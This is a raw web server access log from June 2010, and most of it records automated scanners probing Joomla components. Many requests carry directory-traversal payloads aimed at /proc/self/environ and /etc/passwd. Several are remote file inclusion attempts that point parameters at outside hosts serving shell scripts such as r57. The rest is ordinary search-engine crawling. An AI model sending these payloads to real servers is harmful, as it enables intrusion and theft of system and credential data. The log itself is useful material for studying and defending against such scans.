72.55.146.140 - - [07/Jun/2010:02:36:10 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:11 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:11 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:11 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:11 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:11 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:11 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:18 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:19 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:26 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:26 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.253.162.10 - - [07/Jun/2010:02:36:33 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:36:33 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:37:07 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:37:07 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:37:07 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:37:25 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:37:25 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:37:26 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
189.108.172.26 - - [07/Jun/2010:02:37:27 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
72.55.146.140 - - [07/Jun/2010:02:37:29 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
189.108.172.26 - - [07/Jun/2010:02:37:29 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
72.55.146.140 - - [07/Jun/2010:02:37:29 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:37:29 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
189.108.172.26 - - [07/Jun/2010:02:37:34 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
72.55.146.140 - - [07/Jun/2010:02:37:39 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:37:39 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:37:39 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:37:39 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:37:39 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:37:39 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
189.108.172.26 - - [07/Jun/2010:02:37:43 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
72.55.146.140 - - [07/Jun/2010:02:37:45 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:37:45 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:37:45 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
87.253.162.10 - - [07/Jun/2010:02:37:46 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:37:46 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:37:46 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:38:03 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:38:03 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:38:04 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:38:52 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:38:53 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:39:04 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:39:04 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:39:05 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
187.45.193.159 - - [07/Jun/2010:02:39:45 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
187.45.193.159 - - [07/Jun/2010:02:39:46 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.92.216.195 - - [07/Jun/2010:02:40:45 -0500] "GET /logs//index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
81.92.216.195 - - [07/Jun/2010:02:40:45 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
209.188.90.44 - - [07/Jun/2010:02:43:16 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
173.236.34.10 - - [07/Jun/2010:02:44:47 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:02:44:47 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:02:44:56 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:02:44:56 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
74.53.154.162 - - [07/Jun/2010:02:45:47 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:02:45:48 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:02:46:00 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:02:46:00 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.195.112.180 - - [07/Jun/2010:02:47:53 -0500] "GET /logs/access_log.1181433600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.58.145.214 - - [07/Jun/2010:02:51:17 -0500] "GET /logs/access_log.1238803200/http://marketlink.uk.net/img/.log/r57? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
207.58.145.214 - - [07/Jun/2010:02:51:17 -0500] "GET /http://marketlink.uk.net/img/.log/r57? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
207.58.145.214 - - [07/Jun/2010:02:51:17 -0500] "GET /logs/http://marketlink.uk.net/img/.log/r57? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
67.195.112.180 - - [07/Jun/2010:02:52:09 -0500] "GET /logs/access_log.1219881600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.154.162 - - [07/Jun/2010:02:52:51 -0500] "GET /logs/access_log.1274832000//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:02:52:51 -0500] "GET /logs/access_log.1274832000//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:02:52:51 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:02:52:52 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:02:52:52 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:02:52:52 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
91.121.75.82 - - [07/Jun/2010:02:54:49 -0500] "GET /logs/access_log.1270512000/?sourcedir=http://halonight.net/xml/.log? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.121.75.82 - - [07/Jun/2010:02:54:49 -0500] "GET /?sourcedir=http://halonight.net/xml/.log? HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.121.75.82 - - [07/Jun/2010:02:54:49 -0500] "GET /logs/?sourcedir=http://halonight.net/xml/.log? HTTP/1.1" 200 8566 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
212.227.248.216 - - [07/Jun/2010:03:00:13 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
207.46.199.184 - - [07/Jun/2010:03:02:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [07/Jun/2010:03:04:00 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:04:01 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:04:02 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:04:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.188.90.44 - - [07/Jun/2010:03:08:51 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:03:08:51 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:03:08:51 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
88.191.94.188 - - [07/Jun/2010:03:09:20 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:09:20 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:09:22 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.200.199.236 - - [07/Jun/2010:03:09:30 -0500] "GET /logs/index1.php?s=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:03:09:31 -0500] "GET /logs/index1.php?s=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:03:09:31 -0500] "GET /index1.php?s=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:03:09:31 -0500] "GET /index1.php?s=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:03:09:55 -0500] "GET /logs/access_log.1271808000/index1.php?s=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:03:09:56 -0500] "GET /logs/access_log.1271808000/index1.php?s=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:03:09:56 -0500] "GET /logs/access_log.1272672000/index1.php?s=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [07/Jun/2010:03:09:58 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:09:58 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:10:01 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.200.199.236 - - [07/Jun/2010:03:10:02 -0500] "GET /logs/access_log.1272672000/index1.php?s=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.249.65.145 - - [07/Jun/2010:03:10:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Googlebot-Image/1.0"
66.249.65.145 - - [07/Jun/2010:03:10:04 -0500] "GET /icons/back.gif HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
62.149.207.129 - - [07/Jun/2010:03:11:54 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:03:11:54 -0500] "GET /logs/access_log.1271548800//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:03:11:54 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:03:12:48 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:03:12:48 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:03:12:48 -0500] "GET /logs/access_log.1271548800//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [07/Jun/2010:03:13:55 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:13:55 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:13:56 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:14:14 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:14:17 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:14:17 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.23.35.17 - - [07/Jun/2010:03:21:56 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.90.77.189 - - [07/Jun/2010:03:22:10 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
91.121.164.97 - - [07/Jun/2010:03:22:18 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
64.57.240.235 - - [07/Jun/2010:03:22:26 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
190.152.145.54 - - [07/Jun/2010:03:28:24 -0500] "GET /logs/access_log.1271548800////?_SERVER[DOCUMENT_ROOT]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:03:28:24 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 200 8573 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:03:28:24 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
205.209.170.18 - - [07/Jun/2010:03:28:32 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:32 -0500] "GET /costume HTTP/1.1" 301 331 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:32 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:33 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:34 -0500] "GET /logs/access_log.1208044800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:37 -0500] "GET /logs/access_log.1208131200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:39 -0500] "GET /logs/access_log.1208304000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:40 -0500] "GET /logs/access_log.1209686400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:44 -0500] "GET /logs/access_log.1210291200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:45 -0500] "GET /logs/access_log.1210723200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:50 -0500] "GET /logs/access_log.1211068800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:53 -0500] "GET /logs/access_log.1213142400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:55 -0500] "GET /logs/access_log.1213401600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:28:58 -0500] "GET /logs/access_log.1214265600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:07 -0500] "GET /logs/access_log.1214524800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:11 -0500] "GET /logs/access_log.1214784000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:18 -0500] "GET /logs/access_log.1215302400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:20 -0500] "GET /logs/access_log.1216684800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
